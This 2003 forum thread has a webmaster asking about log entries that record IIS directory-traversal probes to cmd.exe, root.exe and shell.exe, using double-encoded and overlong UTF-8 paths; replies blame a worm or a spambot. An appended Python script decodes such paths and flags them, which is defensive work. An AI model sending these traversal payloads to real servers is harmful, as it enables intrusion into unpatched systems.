
Search Engine Spider and User Agent Identification Forum

    
Indy Library - Chinese Spambot?
strange entries in my log file
bashyam




msg:400097
 6:19 am on Apr 21, 2003 (gmt 0)

Hi,

I found these unrelated entries in my logs frequently... could anyone let me know what it is?
------------------------------------------------------------
24.226.39.127 - - [21/Apr/2003:00:48:07 -0400] "GET /..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:08 -0400] "GET /..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:08 -0400] "GET /_vti_bin/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:09 -0400] "GET /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:10 -0400] "GET /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:10 -0400] "GET /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:11 -0400] "GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:12 -0400] "GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:13 -0400] "GET /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:14 -0400] "GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:15 -0400] "GET /_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:18 -0400] "GET /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:19 -0400] "GET /adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:20 -0400] "GET /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:20 -0400] "GET /cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:21 -0400] "GET /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:21 -0400] "GET /iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:22 -0400] "GET /iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:23 -0400] "GET /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:24 -0400] "GET /iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:25 -0400] "GET /msadc/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:26 -0400] "GET /MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:26 -0400] "GET /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:27 -0400] "GET /MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:27 -0400] "GET /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:28 -0400] "GET /msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:29 -0400] "GET /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:29 -0400] "GET /msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:30 -0400] "GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:31 -0400] "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:32 -0400] "GET /msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:33 -0400] "GET /msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%af../winnt/system32/cmd.exe/?/c/+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:34 -0400] "GET /msdac/root.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:35 -0400] "GET /msdac/shell.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:36 -0400] "GET /PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:37 -0400] "GET /PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:46 -0400] "GET /PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:47 -0400] "GET /PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:48 -0400] "GET /Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:49 -0400] "GET /Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:49 -0400] "GET /Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:50 -0400] "GET /Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:51 -0400] "GET /samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:52 -0400] "GET /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:53 -0400] "GET /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:54 -0400] "GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:55 -0400] "GET /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:56 -0400] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:57 -0400] "GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:00 -0400] "GET /scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:04 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:05 -0400] "GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:05 -0400] "GET /scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:06 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:10 -0400] "GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:10 -0400] "GET /scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:11 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:12 -0400] "GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:13 -0400] "GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:14 -0400] "GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:15 -0400] "GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:15 -0400] "GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:16 -0400] "GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:17 -0400] "GET /scripts/root.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:18 -0400] "GET /scripts/shell.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
------------------------------------------------------------

Thanks..

Balaji.

 

jrobbio




msg:400098
 6:42 am on Apr 21, 2003 (gmt 0)

It's a Chinese spam bot. Please be more selective with the category you choose for your posts. This is the Google section.

kwngian




msg:400099
 8:15 am on Apr 21, 2003 (gmt 0)

>It's a Chinese spam bot.

It is a "compromised" spam bot.

The IP address says it's Canadian.

Even the spammers have their day for having an unpatched Windows machine.

[edited by: kwngian at 10:26 am (utc) on April 21, 2003]

bashyam




msg:400100
 8:51 am on Apr 21, 2003 (gmt 0)

Thanks for your reply.

Also, sorry to post this at Google section... by mistake I did that.

Balaji.

sullen




msg:400101
 9:12 am on Apr 21, 2003 (gmt 0)

Don't know where the Chinese spam bot idea came from - it's a machine infected with the Code Red / Nimda worm.

You can't block it. The best thing to do is look up the ip address to find out which company hosts the machine and then write to them.

bull




msg:400102
 9:57 am on Apr 21, 2003 (gmt 0)

24.226.39.127 is not Chinese:
Cogeco Cable Inc. COGECOWAVE-1 (NET-24-226-0-0-1)
24.226.0.0 - 24.226.127.255

Apart from this, Indy Library is a candidate blocked by many here: [webmasterworld.com...]

jan

jrobbio




msg:400103
 10:13 am on Apr 21, 2003 (gmt 0)
The Chinese bot thing came from a site and I quote:
[quote]Originally, the Indy Library is a programming library which is available at http://www.nevrona.com/Indy or http://indy.torry.net under an Open Source license. This library is included with Borland Delphi 6, 7, C++Builder 6, plus all of the Kylix versions. Unfortunately, this library is hi-jacked and abused by some Chinese spam bots. All recent user-agents with the unmodified "Indy Library" string were of Chinese origin.[/quote]
sullen




msg:400104
 12:03 pm on Apr 21, 2003 (gmt 0)

Righty - missed the "Indy Library" part - I was just going on the addresses it's trying to hit.

I would say contact the host is still the best advice though.
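
The following added example, which is not from any poster in this thread, percent-decodes request paths like the ones in the original post until they stop changing, then tags multi-layer encoding, bytes that cannot occur in shortest-form UTF-8, `..` sequences and the `cmd.exe`/`root.exe`/`shell.exe` targets. The sample log lines, the 192.0.2.x addresses, the tag names and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample in the combined log format of the post above; 192.0.2.x is a
# documentation range and the last request is a benign control.
SAMPLE_LOG = """\
192.0.2.10 - - [21/Apr/2003:00:48:07 -0400] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
192.0.2.10 - - [21/Apr/2003:00:48:08 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
192.0.2.10 - - [21/Apr/2003:00:48:09 -0400] "GET /MSADC/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
192.0.2.10 - - [21/Apr/2003:00:48:10 -0400] "GET /scripts/root.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
192.0.2.20 - - [21/Apr/2003:00:50:00 -0400] "GET /caf%c3%a9/my%20page.html HTTP/1.1" 200 512 "-" "Mozilla/4.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')
# Bytes that never occur in shortest-form UTF-8: C0/C1 and F8-FF lead bytes,
# and the overlong 3- and 4-byte prefixes E0 80-9F and F0 80-8F.
OVERLONG_RE = re.compile(rb'[\xc0\xc1\xf8-\xff]|\xe0[\x80-\x9f]|\xf0[\x80-\x8f]')
TARGET_RE = re.compile(rb'/(cmd|root|shell)\.exe$', re.I)

def classify(request_uri, max_rounds=5):
    """Return the set of probe indicators found in one request URI."""
    cur = request_uri.split('?', 1)[0].encode('utf-8')  # path only, as bytes
    rounds = 0
    while rounds < max_rounds:            # decode until the path is stable
        nxt = unquote_to_bytes(cur)
        if nxt == cur:
            break
        cur, rounds = nxt, rounds + 1
    checks = {
        'multi-encoded': rounds >= 2,     # e.g. %255c or %%35%63 -> %5c -> "\"
        'overlong-utf8': bool(OVERLONG_RE.search(cur)),
        'dot-dot': b'..' in cur,
        'shell-target': bool(TARGET_RE.search(cur)),
    }
    return {tag for tag, hit in checks.items() if hit}

def scan(log_text):
    """Return (client_ip, status, sorted tags) for each line with indicators."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            tags = classify(m.group(2))
            if tags:
                hits.append((m.group(1), int(m.group(3)), sorted(tags)))
    return hits

if __name__ == '__main__':
    print(*scan(SAMPLE_LOG), sep='\n')
```

The `overlong-utf8` tag also fires on paths sent in a single-byte encoding that uses bytes F8-FF, so treat it as an indicator to combine with the others rather than a verdict on its own.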
